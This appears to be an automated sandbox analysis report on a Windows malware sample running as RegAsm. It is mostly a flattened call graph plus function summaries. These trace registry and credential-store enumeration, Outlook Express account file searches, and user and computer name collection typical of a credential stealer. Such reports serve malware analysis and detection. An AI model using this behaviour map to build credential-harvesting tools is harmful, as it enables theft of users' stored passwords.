33608 407a1f 4 API calls 33607->33608 33609 409bee 33608->33609 33609->33582 33611 410d0e LoadLibraryA 33610->33611 33612 410dca 33611->33612 33613 410dfd memset 33612->33613 33653 4070ae 33612->33653 33615 410e1d 33613->33615 33656 410a9c RegOpenKeyExA 33615->33656 33617 410dee SHGetSpecialFolderPathA 33620 401e9e strlen strlen 33617->33620 33619 410e4a 33621 410e7f _mbscpy 33619->33621 33657 410d3d _mbscpy 33619->33657 33620->33485 33620->33486 33621->33620 33623 410e5b 33658 410add RegQueryValueExA 33623->33658 33625 410e73 RegCloseKey 33625->33621 33626->33489 33627->33495 33659 410a9c RegOpenKeyExA 33628->33659 33630 401c4c 33631 401cad 33630->33631 33660 410add RegQueryValueExA 33630->33660 33631->33498 33631->33499 33633 401c6a 33634 401c71 strchr 33633->33634 33635 401ca4 RegCloseKey 33633->33635 33634->33635 33636 401c85 strchr 33634->33636 33635->33631 33636->33635 33637 401c94 33636->33637 33661 406f06 strlen 33637->33661 33639 401ca1 33639->33635 33640->33501 33641->33486 33642->33492 33643->33513 33664 410a9c RegOpenKeyExA 33644->33664 33646 410b34 33647 410b5d 33646->33647 33665 410add RegQueryValueExA 33646->33665 33647->33513 33649 410b4c RegCloseKey 33649->33647 33651->33513 33652->33506 33654 4070bd GetVersionExA 33653->33654 33655 4070ce 33653->33655 33654->33655 33655->33613 33655->33617 33656->33619 33657->33623 33658->33625 33659->33630 33660->33633 33662 406f17 33661->33662 33663 406f1a memcpy 33661->33663 33662->33663 33663->33639 33664->33646 33665->33649 33667 409b40 33666->33667 33669 409b4e 33666->33669 33674 409901 memset SendMessageA 33667->33674 33670 409b99 33669->33670 33671 409b8b 33669->33671 33670->33530 33675 409868 SendMessageA 33671->33675 33673->33526 33674->33669 33675->33670 33676->33534 33677->33535 33679 410807 33678->33679 33680 4107fc FreeLibrary 33678->33680 33679->33535 33680->33679 33682 410816 33681->33682 33683 4107f1 FreeLibrary 33682->33683 33684 410825 33683->33684 33684->33535 33686 404785 FreeLibrary 33685->33686 33687 40473b LoadLibraryA 33686->33687 33689 40474c 33687->33689 33688 404781 33688->33535 33689->33688 33690 404785 FreeLibrary 33689->33690 33690->33688 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33535 33693->33692 33695 4107f1 FreeLibrary 33694->33695 33696 403c30 LoadLibraryA 33695->33696 33697 403c44 33696->33697 33698 4107f1 FreeLibrary 33697->33698 33699 403c6b 33697->33699 33698->33699 33700 404734 2 API calls 33699->33700 33701 403c86 33700->33701 33768 4036e5 33701->33768 33704 4036e5 27 API calls 33705 403c9a 33704->33705 33706 4036e5 27 API calls 33705->33706 33707 403ca4 33706->33707 33708 4036e5 27 API calls 33707->33708 33709 403cae 33708->33709 33780 4085d2 33709->33780 33717 403ce5 33718 403cf7 33717->33718 33968 402bd1 40 API calls 33717->33968 33828 410a9c RegOpenKeyExA 33718->33828 33721 403d0a 33722 403d1c 33721->33722 33969 402bd1 40 API calls 33721->33969 33829 402c5d 33722->33829 33726 4070ae GetVersionExA 33727 403d31 33726->33727 33847 410a9c RegOpenKeyExA 33727->33847 33729 403d51 33730 403d61 33729->33730 33848 402b22 memset 33729->33848 33857 410a9c RegOpenKeyExA 33730->33857 33733 403d87 33734 403d97 33733->33734 33735 402b22 47 API calls 33733->33735 33858 410a9c RegOpenKeyExA 33734->33858 33735->33734 33737 403dbd 33738 403dcd 33737->33738 33739 402b22 47 API calls 33737->33739 33740 410808 FreeLibrary 33738->33740 33739->33738 33741 403ddd 33740->33741 33742 404785 FreeLibrary 33741->33742 33743 403de8 33742->33743 33859 402fdb 33743->33859 33746 402fdb 34 API calls 33747 403e00 33746->33747 33875 4032b7 33747->33875 33756 403e3b 33757 403e73 33756->33757 33758 403e46 _mbscpy 33756->33758 33922 40fb00 33757->33922 33971 40f334 324 API calls 33758->33971 33767->33537 33769 4036fb 33768->33769 33772 4037c5 33768->33772 33972 410863 UuidFromStringA UuidFromStringA 33769->33972 33772->33704 33773 403716 strchr 33773->33772 33774 403730 33773->33774 33976 4021b6 memset 33774->33976 33776 40373f _mbscpy _mbscpy strlen 33777 4037a4 _mbscpy 33776->33777 33778 403789 sprintf 33776->33778 33977 4023e5 16 API calls 33777->33977 33778->33777 33781 4085e2 33780->33781 33978 4082cd 11 API calls 33781->33978 33785 408600 33786 403cba 33785->33786 33787 40860b memset 33785->33787 33798 40821d 33786->33798 33981 410b62 RegEnumKeyExA 33787->33981 33789 4086d2 RegCloseKey 33789->33786 33791 408637 33791->33789 33792 40865c memset 33791->33792 33982 410a9c RegOpenKeyExA 33791->33982 33985 410b62 RegEnumKeyExA 33791->33985 33983 410add RegQueryValueExA 33792->33983 33795 408694 33984 40848b 9 API calls 33795->33984 33797 4086ab RegCloseKey 33797->33791 33986 410a9c RegOpenKeyExA 33798->33986 33800 40823f 33801 403cc6 33800->33801 33802 408246 memset 33800->33802 33810 4086e0 33801->33810 33987 410b62 RegEnumKeyExA 33802->33987 33804 40826f 33805 4082bf RegCloseKey 33804->33805 33988 410a9c RegOpenKeyExA 33804->33988 33989 4080ed 10 API calls 33804->33989 33990 410b62 RegEnumKeyExA 33804->33990 33805->33801 33809 4082a2 RegCloseKey 33809->33804 33991 4045db 33810->33991 33814 40872d 33817 408737 wcslen 33814->33817 33818 4088ef 33814->33818 33816 40872b CredEnumerateW 33816->33814 33817->33818 33824 40876a 33817->33824 33997 404656 33818->33997 33819 40877a wcsncmp 33819->33824 33821 404734 2 API calls 33821->33824 33822 404785 FreeLibrary 33822->33824 33823 408812 memset 33823->33824 33825 40883c memcpy wcschr 33823->33825 33824->33818 33824->33819 33824->33821 33824->33822 33824->33823 33824->33825 33826 4088c3 LocalFree 33824->33826 34000 40466b _mbscpy 33824->34000 33825->33824 33826->33824 33827 410a9c RegOpenKeyExA 33827->33717 33828->33721 34001 410a9c RegOpenKeyExA 33829->34001 33831 402c7a 33832 402da5 33831->33832 33833 402c87 memset 33831->33833 33832->33726 34002 410b62 RegEnumKeyExA 33833->34002 33835 402d9c RegCloseKey 33835->33832 33836 410b1e 3 API calls 33837 402ce4 memset sprintf 33836->33837 34003 410a9c RegOpenKeyExA 33837->34003 33839 402d28 33840 402d3a sprintf 33839->33840 34006 402bd1 40 API calls 33839->34006 34004 410a9c RegOpenKeyExA 33840->34004 33845 402cb2 33845->33835 33845->33836 33846 402d9a 33845->33846 34005 410b62 RegEnumKeyExA 33845->34005 34007 402bd1 40 API calls 33845->34007 33846->33835 33847->33729 34008 410b62 RegEnumKeyExA 33848->34008 33850 402bbb RegCloseKey 33850->33730 33851 406f06 2 API calls 33853 402b58 33851->33853 33853->33850 33853->33851 33856 402bb8 33853->33856 34009 410a9c RegOpenKeyExA 33853->34009 34010 402a9d memset 33853->34010 34018 410b62 RegEnumKeyExA 33853->34018 33856->33850 33857->33733 33858->33737 34058 410a9c RegOpenKeyExA 33859->34058 33861 402ff9 33862 403006 memset 33861->33862 33863 40312c 33861->33863 34059 410b62 RegEnumKeyExA 33862->34059 33863->33746 33865 403122 RegCloseKey 33865->33863 33866 410b1e 3 API calls 33867 403058 memset sprintf 33866->33867 34060 410a9c RegOpenKeyExA 33867->34060 33869 4030a2 memset 34061 410b62 RegEnumKeyExA 33869->34061 33871 4030f9 RegCloseKey 33873 403033 33871->33873 33873->33865 33873->33866 33873->33869 33873->33871 33874 410b62 RegEnumKeyExA 33873->33874 34062 402db3 26 API calls 33873->34062 33874->33873 33876 4032d5 33875->33876 33877 4033a9 33875->33877 34063 4021b6 memset 33876->34063 33890 4034e4 memset memset 33877->33890 33879 4032e1 34064 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33879->34064 33881 4032ea 33882 4032f8 memset GetPrivateProfileSectionA 33881->33882 34065 4023e5 16 API calls 33881->34065 33882->33877 33887 40332f 33882->33887 33884 40339b strlen 33884->33877 33884->33887 33886 403350 strchr 33886->33887 33887->33877 33887->33884 34066 4021b6 memset 33887->34066 34067 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33887->34067 34068 4023e5 16 API calls 33887->34068 33891 410b1e 3 API calls 33890->33891 33892 40353f 33891->33892 33893 40357f 33892->33893 33894 403546 _mbscpy 33892->33894 33898 403985 33893->33898 34069 406d55 strlen _mbscat 33894->34069 33896 403565 _mbscat 34070 4033f0 19 API calls 33896->34070 34071 40466b _mbscpy 33898->34071 33900 4039aa 33904 4039ff 33900->33904 34072 40f460 memset memset 33900->34072 34093 40f6e2 33900->34093 34109 4038e8 21 API calls 33900->34109 33905 404785 FreeLibrary 33904->33905 33906 403a0b 33905->33906 33907 4037ca memset memset 33906->33907 34117 444551 memset 33907->34117 33910 4038e2 33910->33756 33970 40f334 324 API calls 33910->33970 33912 40382e 33913 406f06 2 API calls 33912->33913 33914 403843 33913->33914 33915 406f06 2 API calls 33914->33915 33916 403855 strchr 33915->33916 33917 403884 _mbscpy 33916->33917 33918 403897 strlen 33916->33918 33919 4038bf _mbscpy 33917->33919 33918->33919 33920 4038a4 sprintf 33918->33920 34129 4023e5 16 API calls 33919->34129 33920->33919 33923 44b090 33922->33923 33924 40fb10 RegOpenKeyExA 33923->33924 33925 403e7f 33924->33925 33926 40fb3b 33924->33926 33936 40f96c 33925->33936 33927 40fb55 RegQueryValueExA 33926->33927 33928 40fc2d RegCloseKey 33926->33928 33929 40fc23 RegCloseKey 33927->33929 33930 40fb84 33927->33930 33928->33925 33929->33928 33931 404734 2 API calls 33930->33931 33932 40fb91 33931->33932 33932->33929 33933 40fc19 LocalFree 33932->33933 33934 40fbdd memcpy memcpy 33932->33934 33933->33929 34134 40f802 9 API calls 33934->34134 33937 4070ae GetVersionExA 33936->33937 33938 40f98d 33937->33938 33939 4045db 2 API calls 33938->33939 33947 40f9a9 33939->33947 33940 40fae6 33941 404656 FreeLibrary 33940->33941 33942 403e85 33941->33942 33948 4442ea memset 33942->33948 33943 40fa13 memset WideCharToMultiByte 33944 40fa43 _strnicmp 33943->33944 33943->33947 33945 40fa5b WideCharToMultiByte 33944->33945 33944->33947 33946 40fa88 WideCharToMultiByte 33945->33946 33945->33947 33946->33947 33947->33940 33947->33943 33949 410dbb 9 API calls 33948->33949 33950 444329 33949->33950 34135 40759e strlen strlen 33950->34135 33955 410dbb 9 API calls 33956 444350 33955->33956 33957 40759e 3 API calls 33956->33957 33958 44435a 33957->33958 33959 444212 65 API calls 33958->33959 33960 444366 memset memset 33959->33960 33961 410b1e 3 API calls 33960->33961 33962 4443b9 ExpandEnvironmentStringsA strlen 33961->33962 33963 4443f4 _strcmpi 33962->33963 33964 4443e5 33962->33964 33965 403e91 33963->33965 33966 44440c 33963->33966 33964->33963 33965->33535 33967 444212 65 API calls 33966->33967 33967->33965 33968->33718 33969->33722 33970->33756 33971->33757 33973 40370e 33972->33973 33974 41088d 33972->33974 33973->33772 33973->33773 33974->33973 33975 4108be memcpy CoTaskMemFree 33974->33975 33975->33973 33976->33776 33977->33772 33979 40841c 33978->33979 33980 410a9c RegOpenKeyExA 33979->33980 33980->33785 33981->33791 33982->33791 33983->33795 33984->33797 33985->33791 33986->33800 33987->33804 33988->33804 33989->33809 33990->33804 33992 404656 FreeLibrary 33991->33992 33993 4045e3 LoadLibraryA 33992->33993 33994 404643 33993->33994 33995 4045f4 33993->33995 33994->33814 33994->33816 33994->33818 33995->33994 33996 404656 FreeLibrary 33995->33996 33996->33994 33998 403cd2 33997->33998 33999 40465c FreeLibrary 33997->33999 33998->33827 33999->33998 34000->33824 34001->33831 34002->33845 34003->33839 34004->33845 34005->33845 34006->33840 34007->33845 34008->33853 34009->33853 34019 410b62 RegEnumKeyExA 34010->34019 34012 402ad0 34013 402b15 RegCloseKey 34012->34013 34017 402b14 34012->34017 34020 410a9c RegOpenKeyExA 34012->34020 34021 402a14 memset 34012->34021 34029 410b62 RegEnumKeyExA 34012->34029 34013->33853 34017->34013 34018->33853 34019->34012 34020->34012 34030 410b62 RegEnumKeyExA 34021->34030 34023 402a93 RegCloseKey 34023->34012 34025 402a48 34025->34023 34031 410a9c RegOpenKeyExA 34025->34031 34032 4027be 34025->34032 34047 410b62 RegEnumKeyExA 34025->34047 34029->34012 34030->34025 34031->34025 34033 40285a memset 34032->34033 34048 4029a2 RegQueryValueExA 34033->34048 34035 402885 34035->34033 34036 402998 RegCloseKey 34035->34036 34054 4021b6 memset 34035->34054 34036->34025 34038 402898 _mbscpy 34039 4029a2 4 API calls 34038->34039 34043 4028d4 34039->34043 34040 4029a2 RegQueryValueExA WideCharToMultiByte strlen memcpy 34040->34043 34041 410ab6 RegQueryValueExA 34041->34043 34043->34040 34043->34041 34055 401989 _mbscpy _mbscat _mbscat 34043->34055 34056 402624 10 API calls 34043->34056 34045 40296d _mbscpy 34057 4023e5 16 API calls 34045->34057 34047->34025 34049 4029f2 34048->34049 34050 4029dd 34048->34050 34049->34035 34051 4029f7 WideCharToMultiByte 34050->34051 34052 4029e9 34050->34052 34051->34049 34053 406f06 2 API calls 34052->34053 34053->34049 34054->34038 34055->34043 34056->34045 34057->34035 34058->33861 34059->33873 34060->33873 34061->33873 34062->33873 34063->33879 34064->33881 34065->33882 34066->33886 34067->33887 34068->33887 34069->33896 34070->33893 34071->33900 34110 4078ba 34072->34110 34075 4078ba _mbsnbcat 34076 40f5a3 RegOpenKeyExA 34075->34076 34077 40f5c3 RegQueryValueExA 34076->34077 34078 40f6d9 34076->34078 34079 40f6d0 RegCloseKey 34077->34079 34080 40f5f0 34077->34080 34078->33900 34079->34078 34080->34079 34090 40f675 34080->34090 34114 40466b _mbscpy 34080->34114 34082 40f611 34084 404734 2 API calls 34082->34084 34088 40f616 34084->34088 34085 40f69e RegQueryValueExA 34085->34079 34087 40f6c1 34085->34087 34086 40f66a 34089 404785 FreeLibrary 34086->34089 34087->34079 34088->34086 34091 40f661 LocalFree 34088->34091 34092 40f645 memcpy 34088->34092 34089->34090 34090->34079 34115 4012ee strlen 34090->34115 34091->34086 34092->34091 34116 40466b _mbscpy 34093->34116 34095 40f6fa 34096 4045db 2 API calls 34095->34096 34097 40f708 34096->34097 34098 40f7e2 34097->34098 34099 404734 2 API calls 34097->34099 34100 404656 FreeLibrary 34098->34100 34104 40f715 34099->34104 34101 40f7f1 34100->34101 34102 404785 FreeLibrary 34101->34102 34103 40f7fc 34102->34103 34103->33900 34104->34098 34105 40f797 WideCharToMultiByte 34104->34105 34106 40f7b8 strlen 34105->34106 34107 40f7d9 LocalFree 34105->34107 34106->34107 34108 40f7c8 _mbscpy 34106->34108 34107->34098 34108->34107 34109->33900 34111 4078e6 34110->34111 34112 4078c7 _mbsnbcat 34111->34112 34113 4078ea 34111->34113 34112->34111 34113->34075 34114->34082 34115->34085 34116->34095 34130 410a9c RegOpenKeyExA 34117->34130 34119 44458b 34120 40381a 34119->34120 34131 410add RegQueryValueExA 34119->34131 34120->33910 34128 4021b6 memset 34120->34128 34122 4445a4 34123 4445dc RegCloseKey 34122->34123 34132 410add RegQueryValueExA 34122->34132 34123->34120 34125 4445c1 34125->34123 34133 444879 30 API calls 34125->34133 34127 4445da 34127->34123 34128->33912 34129->33910 34130->34119 34131->34122 34132->34125 34133->34127 34134->33933 34136 4075c9 34135->34136 34137 4075bb _mbscat 34135->34137 34138 444212 34136->34138 34137->34136 34154 407e9d 34138->34154 34141 44424d 34142 444274 34141->34142 34162 444196 34141->34162 34173 407ef8 34141->34173 34143 407e9d 9 API calls 34142->34143 34146 4442a0 34143->34146 34145 407ef8 9 API calls 34145->34146 34146->34145 34147 4442ce 34146->34147 34153 444212 65 API calls 34146->34153 34183 407e62 34146->34183 34187 407f90 34147->34187 34151 407f90 FindClose 34152 4442e4 34151->34152 34152->33955 34153->34146 34155 407f90 FindClose 34154->34155 34156 407eaa 34155->34156 34157 406f06 2 API calls 34156->34157 34158 407ebd strlen strlen 34157->34158 34159 407ee1 34158->34159 34160 407eea 34158->34160 34190 4070e3 strlen _mbscat _mbscpy _mbscat 34159->34190 34160->34141 34191 406d01 CreateFileA 34162->34191 34164 4441a1 34165 44420e 34164->34165 34166 4441aa GetFileSize 34164->34166 34165->34141 34167 444203 CloseHandle 34166->34167 34168 4441bd ??2@YAPAXI SetFilePointer 34166->34168 34167->34165 34192 407560 ReadFile 34168->34192 34170 4441e4 34193 444059 34170->34193 34174 407f03 FindFirstFileA 34173->34174 34175 407f24 FindNextFileA 34173->34175 34176 407f3f 34174->34176 34177 407f46 strlen strlen 34175->34177 34178 407f3a 34175->34178 34176->34177 34182 407f7f 34176->34182 34180 407f76 34177->34180 34177->34182 34179 407f90 FindClose 34178->34179 34179->34176 34224 4070e3 strlen _mbscat _mbscpy _mbscat 34180->34224 34182->34141 34184 407e94 34183->34184 34185 407e6c strcmp 34183->34185 34184->34146 34185->34184 34186 407e83 strcmp 34185->34186 34186->34184 34188 407fa3 34187->34188 34189 407f99 FindClose 34187->34189 34188->34151 34189->34188 34190->34160 34191->34164 34192->34170 34194 44b090 34193->34194 34195 444066 wcslen ??2@YAPAXI WideCharToMultiByte 34194->34195 34208 44338b 6 API calls 34195->34208 34197 44409f 34198 4440bf strlen 34197->34198 34209 4434fc ??3@YAXPAX ??2@YAPAXI 34198->34209 34200 4440df memcpy 34210 443607 34200->34210 34202 44413d ??3@YAXPAX 34220 443473 9 API calls 34202->34220 34205 406f06 2 API calls 34205->34202 34207 44418f ??3@YAXPAX 34207->34167 34208->34197 34209->34200 34221 407948 free free 34210->34221 34212 443639 34222 407948 free free 34212->34222 34214 44391c 34214->34202 34214->34205 34215 407a1f 4 API calls 34217 443644 34215->34217 34216 443528 19 API calls 34216->34217 34217->34214 34217->34215 34217->34216 34218 44379d memcpy 34217->34218 34223 442d8e 9 API calls 34217->34223 34218->34217 34220->34207 34221->34212 34222->34217 34223->34217 34224->34182 34225->33550 34226->33554 34227->33561 34228->33560 34229->33567 34230->33564 34231->33559 34249 411853 RtlInitializeCriticalSection memset 34250 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34425 40a256 13 API calls 34427 432e5b 17 API calls 34429 43fa5a 20 API calls 34252 401060 41 API calls 34432 427260 CloseHandle memset memset 34256 410c68 FindResourceA SizeofResource LoadResource LockResource 34434 405e69 13 API calls 34258 433068 15 API calls __fprintf_l 34436 414a6d 18 API calls 34437 43fe6f 134 API calls 34260 424c6d 15 API calls __fprintf_l 34438 426741 19 API calls 34262 440c70 17 API calls 34263 443c71 43 API calls 34266 427c79 24 API calls 34441 416e7e memset __fprintf_l 34270 42800b 47 API calls 34271 425115 85 API calls __fprintf_l 34444 41960c 61 API calls 34272 43f40c 122 API calls __fprintf_l 34275 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34276 43f81a 20 API calls 34278 414c20 memset memset 34279 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34448 414625 18 API calls 34449 404225 modf 34450 403a26 strlen WriteFile 34452 40422a 12 API calls 34456 427632 memset memset memcpy 34457 40ca30 59 API calls 34458 404235 26 API calls 34280 42ec34 61 API calls __fprintf_l 34281 425115 76 API calls __fprintf_l 34459 425115 77 API calls __fprintf_l 34461 44223a 38 API calls 34287 43183c 112 API calls 34462 44b2c5 _onexit __dllonexit 34467 42a6d2 memcpy __allrem 34289 405cda 65 API calls 34475 43fedc 138 API calls 34476 4116e1 16 API calls __fprintf_l 34292 4244e6 19 API calls 34294 42e8e8 127 API calls __fprintf_l 34295 4118ee RtlLeaveCriticalSection 34481 43f6ec 22 API calls 34297 425115 119 API calls __fprintf_l 34298 410cf3 EnumResourceNamesA 34484 4492f0 memcpy memcpy 34486 43fafa 18 API calls 34488 4342f9 15 API calls __fprintf_l 34299 4144fd 19 API calls 34490 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34491 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34494 443a84 _mbscpy 34496 43f681 17 API calls 34302 404487 22 API calls 34498 415e8c 16 API calls __fprintf_l 34306 411893 RtlDeleteCriticalSection __fprintf_l 34307 41a492 42 API calls 34502 403e96 34 API calls 34503 410e98 memset SHGetPathFromIDList SendMessageA 34309 426741 109 API calls __fprintf_l 34310 4344a2 18 API calls 34311 4094a2 10 API calls 34506 4116a6 15 API calls __fprintf_l 34507 43f6a4 17 API calls 34508 440aa3 20 API calls 34510 427430 45 API calls 34314 4090b0 7 API calls 34315 4148b0 15 API calls 34317 4118b4 RtlEnterCriticalSection 34318 4014b7 CreateWindowExA 34319 40c8b8 19 API calls 34321 4118bf RtlTryEnterCriticalSection 34515 42434a 18 API calls __fprintf_l 34517 405f53 12 API calls 34329 43f956 59 API calls 34331 40955a 17 API calls 34332 428561 36 API calls 34333 409164 7 API calls 34521 404366 19 API calls 34525 40176c ExitProcess 34528 410777 42 API calls 34338 40dd7b 51 API calls 34339 425d7c 16 API calls __fprintf_l 34530 43f6f0 25 API calls 34531 42db01 22 API calls 34340 412905 15 API calls __fprintf_l 34532 403b04 54 API calls 34533 405f04 SetDlgItemTextA GetDlgItemTextA 34534 44b301 ??3@YAXPAX 34537 4120ea 14 API calls 3 library calls 34538 40bb0a 8 API calls 34540 413f11 strcmp 34344 434110 17 API calls __fprintf_l 34347 425115 108 API calls __fprintf_l 34541 444b11 _onexit 34349 425115 76 API calls __fprintf_l 34352 429d19 10 API calls 34544 444b1f __dllonexit 34545 409f20 _strcmpi 34354 42b927 31 API calls 34548 433f26 19 API calls __fprintf_l 34549 44b323 FreeLibrary 34550 427f25 46 API calls 34551 43ff2b 17 API calls 33219 444b36 33222 444b10 33219->33222 33221 444b3f 33223 444b1f __dllonexit 33222->33223 33224 444b19 _onexit 33222->33224 33223->33221 33224->33223 34552 43fb30 19 API calls 34361 414d36 16 API calls 34363 40ad38 7 API calls 34554 433b38 16 API calls __fprintf_l 34232 44b33b 34233 44b344 ??3@YAXPAX 34232->34233 34234 44b34b 34232->34234 34233->34234 34235 44b354 ??3@YAXPAX 34234->34235 34236 44b35b 34234->34236 34235->34236 34237 44b364 ??3@YAXPAX 34236->34237 34238 44b36b 34236->34238 34237->34238 34239 44b374 ??3@YAXPAX 34238->34239 34240 44b37b 34238->34240 34239->34240 34367 426741 21 API calls 34368 40c5c3 124 API calls 34370 43fdc5 17 API calls 34555 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34373 4161cb memcpy memcpy memcpy memcpy 33234 44b3cf 33235 44b3e6 33234->33235 33237 44b454 33234->33237 33235->33237 33241 44b40e 33235->33241 33238 44b405 33238->33237 33239 44b435 VirtualProtect 33238->33239 33239->33237 33240 44b444 VirtualProtect 33239->33240 33240->33237 33242 44b413 33241->33242 33247 44b454 33242->33247 33248 44b42b 33242->33248 33244 44b41c 33245 44b435 VirtualProtect 33244->33245 33244->33247 33246 44b444 VirtualProtect 33245->33246 33245->33247 33246->33247 33249 44b431 33248->33249 33250 44b435 VirtualProtect 33249->33250 33251 44b454 33249->33251 33250->33251 33252 44b444 VirtualProtect 33250->33252 33252->33251 34560 43ffc8 18 API calls 34374 4281cc 15 API calls __fprintf_l 34562 4383cc 110 API calls __fprintf_l 34375 4275d3 41 API calls 34563 4153d3 22 API calls __fprintf_l 34376 444dd7 _XcptFilter 34568 4013de 15 API calls 34570 425115 111 API calls __fprintf_l 34571 43f7db 18 API calls 34574 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34378 4335ee 16 API calls __fprintf_l 34576 429fef 11 API calls 34379 444deb _exit _c_exit 34577 40bbf0 138 API calls 34382 425115 79 API calls __fprintf_l 34581 437ffa 22 API calls 34386 4021ff 14 API calls 34387 43f5fc 149 API calls 34582 40e381 9 API calls 34389 405983 40 API calls 34390 42b186 27 API calls __fprintf_l 34391 427d86 76 API calls 34392 403585 20 API calls 34394 42e58e 18 API calls __fprintf_l 34397 425115 75 API calls __fprintf_l 34399 401592 8 API calls 33225 410b92 33228 410a6b 33225->33228 33227 410bb2 33229 410a77 33228->33229 33230 410a89 GetPrivateProfileIntA 33228->33230 33233 410983 memset _itoa WritePrivateProfileStringA 33229->33233 33230->33227 33232 410a84 33232->33227 33233->33232 34586 434395 16 API calls 34401 441d9c memcmp 34588 43f79b 119 API calls 34402 40c599 32 API calls 34589 426741 87 API calls 34406 4401a6 21 API calls 34408 426da6 memcpy memset memset memcpy 34409 4335a5 15 API calls 34411 4299ab memset memset memcpy memset memset 34412 40b1ab 8 API calls 34594 425115 76 API calls __fprintf_l 34598 4113b2 18 API calls 2 library calls 34602 40a3b8 memset sprintf SendMessageA 33253 410bbc 33256 4109cf 33253->33256 33257 4109dc 33256->33257 33258 410a23 memset GetPrivateProfileStringA 33257->33258 33259 4109ea memset 33257->33259 33264 407646 strlen 33258->33264 33269 4075cd sprintf memcpy 33259->33269 33262 410a0c WritePrivateProfileStringA 33263 410a65 33262->33263 33265 40765a 33264->33265 33266 40765c 33264->33266 33265->33263 33268 4076a3 33266->33268 33270 40737c strtoul 33266->33270 33268->33263 33269->33262 33270->33266 34414 40b5bf memset memset _mbsicmp

                                                                                                                                                                                Executed Functions

                                                                                                                                                                                Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 159 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 160 408450-408453 159->160 161 40841c 159->161 163 408484-408488 160->163 164 408455-40845e 160->164 162 408422-40842b 161->162 165 408432-40844e 162->165 166 40842d-408431 162->166 167 408460-408464 164->167 168 408465-408482 164->168 165->160 165->162 166->165 167->168 168->163 168->164
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 0040832F
                                                                                                                                                                                • memset.MSVCRT ref: 00408343
                                                                                                                                                                                • memset.MSVCRT ref: 0040835F
                                                                                                                                                                                • memset.MSVCRT ref: 00408376
                                                                                                                                                                                • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                                                                                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                                                                                                                                                • strlen.MSVCRT ref: 004083E9
                                                                                                                                                                                • strlen.MSVCRT ref: 004083F8
                                                                                                                                                                                • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                • API String ID: 1832431107-3760989150
                                                                                                                                                                                • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                                                                                                                                                • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                                                                                                                                                • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                                                                                                                                                Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                                                                                                                                                • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                                                                                                                                                • strlen.MSVCRT ref: 00407F5C
                                                                                                                                                                                • strlen.MSVCRT ref: 00407F64
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000019.00000002.497411315.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_25_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileFindstrlen$FirstNext
                                                                                                                                                                                • String ID: ACD
                                                                                                                                                                                • API String ID: 379999529-620537770
                                                                                                                                                                                • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                                                                                                                                                                • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                                                                                                                                                                                • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                                                                                                                                                                Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00401E8B
